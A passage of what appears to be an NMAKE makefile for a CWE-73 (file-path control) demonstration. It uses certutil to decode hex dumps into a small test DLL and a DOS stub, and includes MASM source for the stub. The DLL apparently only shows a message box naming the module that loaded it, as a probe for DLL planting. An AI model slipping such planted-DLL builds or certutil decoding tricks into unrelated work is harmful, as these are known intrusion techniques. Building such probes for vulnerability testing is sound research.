00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
<<NOKEEP

CWE-73.DLL: CWE-73.MAK
	CERTUTIL.EXE /DecodeHex /F /V << $@
4d 5a 90 00 01 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
e0 00 00 00 43 00 00 00 40 00 00 00 00 00 00 00   ....C...@.......
00 00 00 00 19 57 04 27 00 00 00 00 00 00 00 00   .....W.'........
00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 00   ................
28 43 29 6f 70 79 72 69 67 68 74 20 32 30 30 34   (C)opyright 2004
2d 32 30 32 35 2c 20 53 74 65 66 61 6e 20 4b 61   -2025, Stefan Ka
6e 74 68 61 6b 20 3c 73 74 65 66 61 6e 2e 6b 61   nthak <stefan.ka
6e 74 68 61 6b 40 6e 65 78 67 6f 2e 64 65 3e 0d   nthak@nexgo.de>.
0a 07 24 0e 1f 33 d2 b4 09 cd 21 b8 01 4c cd 21   .....3....!..L.!
50 45 00 00 4c 01 03 00 56 4f 49 44 00 00 00 00   PE..L...VOID....
00 00 00 00 e0 00 22 2d 0b 01 0a 00 00 02 00 00   ......"-........
00 04 00 00 00 00 00 00 00 10 00 00 00 10 00 00   ................
00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00   . ..............
05 00 00 00 00 00 2f 03 05 00 00 00 00 00 00 00   ....../.........
00 40 00 00 00 02 00 00 af 67 00 00 02 00 40 05   .@.......g....@.
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00   ................
00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00   ................
14 20 00 00 3c 00 00 00 00 00 00 00 00 00 00 00   . ..<...........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 30 00 00 10 00 00 00 00 00 00 00 00 00 00 00   .0..............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 20 00 00 14 00 00 00   ......... ......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00   .........code...
91 00 00 00 00 10 00 00 00 02 00 00 00 02 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60   ............ ..`
2e 63 6f 6e 73 74 00 00 c0 00 00 00 00 20 00 00   .const....... ..
00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00   ....@..@.reloc..
10 00 00 00 00 30 00 00 00 02 00 00 00 06 00 00   .....0..........
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42   ............@..B
55 8b ec 81 ec 10 04 00 00 53 56 57 8b 3d 00 20   U........SVW.=. 
00 10 be 04 01 00 00 56 8d 85 f8 fd ff ff 50 ff   .......V......P.
75 08 ff d7 8b d8 56 8d 85 f0 fb ff ff 50 6a 00   u.....V......Pj.
ff d7 83 7d 0c 01 8b f8 74 04 33 c0 eb 4c ff 75   ...}....t.3..L.u
08 ff 15 04 20 00 10 85 c0 74 ef 3b de 73 0a 33   .... ....t.;.s.3
c0 66 89 84 5d f8 fd ff ff 3b fe 73 0a 33 c0 66   .f..]....;.s.3.f
89 84 7d f0 fb ff ff 68 00 04 00 00 6a 01 8d 85   ..}....h....j...
f8 fd ff ff 50 8d 85 f0 fb ff ff 50 6a 00 ff 15   ....P......Pj...
0c 20 00 10 48 f7 d8 1b c0 40 5f 5e 5b c9 c2 0c   . ..H....@_^[...
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
80 20 00 00 64 20 00 00 00 00 00 00 a4 20 00 00   . ..d ....... ..
00 00 00 00 50 20 00 00 00 00 00 00 00 00 00 00   ....P ..........
96 20 00 00 00 20 00 00 5c 20 00 00 00 00 00 00   . ... ..\ ......
00 00 00 00 b4 20 00 00 0c 20 00 00 00 00 00 00   ..... ... ......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
80 20 00 00 64 20 00 00 00 00 00 00 a4 20 00 00   . ..d ....... ..
00 00 00 00 de 00 44 69 73 61 62 6c 65 54 68 72   ......DisableThr
65 61 64 4c 69 62 72 61 72 79 43 61 6c 6c 73 00   eadLibraryCalls.
14 02 47 65 74 4d 6f 64 75 6c 65 46 69 6c 65 4e   ..GetModuleFileN
61 6d 65 57 00 00 4b 45 52 4e 45 4c 33 32 2e 64   ameW..KERNEL32.d
6c 6c 00 00 10 02 4d 65 73 73 61 67 65 42 6f 78   ll....MessageBox
45 78 57 00 55 53 45 52 33 32 2e 64 6c 6c 00 00   ExW.USER32.dll..
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 10 00 00 10 00 00 00 0e 30 43 30 80 30 00 00   .........0C0.0..
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
<<NOKEEP

CWE-73.DOS: CWE-73.MAK
	CERTUTIL.EXE /DecodeHex /F /V << $@
4D 5A 90 00 01 00 00 00 04 00 00 00 FF FF 00 00   MZ..............
E0 00 00 00 43 00 00 00 40 00 00 00 00 00 00 00   ....C...@.......
00 00 00 00 19 57 04 27 00 00 00 00 00 00 00 00   .....W.'........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
28 43 29 6F 70 79 72 69 67 68 74 20 32 30 30 34   (C)opyright 2004
2D 32 30 32 35 2C 20 53 74 65 66 61 6E 20 4B 61   -2025, Stefan Ka
6E 74 68 61 6B 20 3C 73 74 65 66 61 6E 2E 6B 61   nthak <stefan.ka
6E 74 68 61 6B 40 6E 65 78 67 6F 2E 64 65 3E 0D   nthak@nexgo.de>.
0A 07 24 0E 1F 33 D2 B4 09 CD 21 B8 01 4C CD 21   .....3....!..L.!
<<NOKEEP

CWE-73.OMF: CWE-73.MAK
	ML.EXE /Brepro /Fo$@ /nologo /omf /Ta<< /W3 /X
; Copyright (C) 2004-2025, Stefan Kanthak <stefan.kanthak@nexgo.de>

	.model	tiny

; https://support.microsoft.com/en-us/kb/65122

e_header struct				; DOS .EXE header
e_magic	word	5A4Dh			; magic number "MZ"
e_cblp	word	stop - header		; bytes on last page of file
e_cp	word	1			; pages in file
e_crlc	word	0			; number of relocation table entries
e_cparhdr word	sizeof header / 16	; size of header in paragraphs
e_minalloc word	0			; minimum extra paragraphs needed
e_maxalloc word	65535			; maximum extra paragraphs needed
e_ss	word	0			; initial (PSP relative) SS value
e_sp	word	stack - header		; initial (SS relative) SP value
e_csum	word	0			; checksum
e_ip	word	sizeof message		; initial (CS relative) IP value
e_cs	word	0			; initial (PSP relative) CS value
e_lfarlc word	sizeof header		; file address of relocation table
e_ovno	word	0			; overlay number
e_res	word	4 dup (0)		; reserved words
e_oemid	word	5719h			; OEM identifier
e_oeminfo word	2704h			; OEM information
e_res2	word	10 dup (0)		; reserved words
e_lfanew dword	0			; file address of new exe header
e_header ends

	.code

header	e_header <>

message	byte	"(C)opyright 2004-2025, Stefan Kanthak <stefan.kanthak@nexgo.de>", 0Dh, 0Ah, 07h, 24h

start:
	push	cs
	pop	ds
	xor	dx, dx
	mov	ah, 09h
	int	21h

	mov	ax, 4C01h
	int	21h
stop:
	dword	20 dup (?)
stack:
	end	start
<<NOKEEP
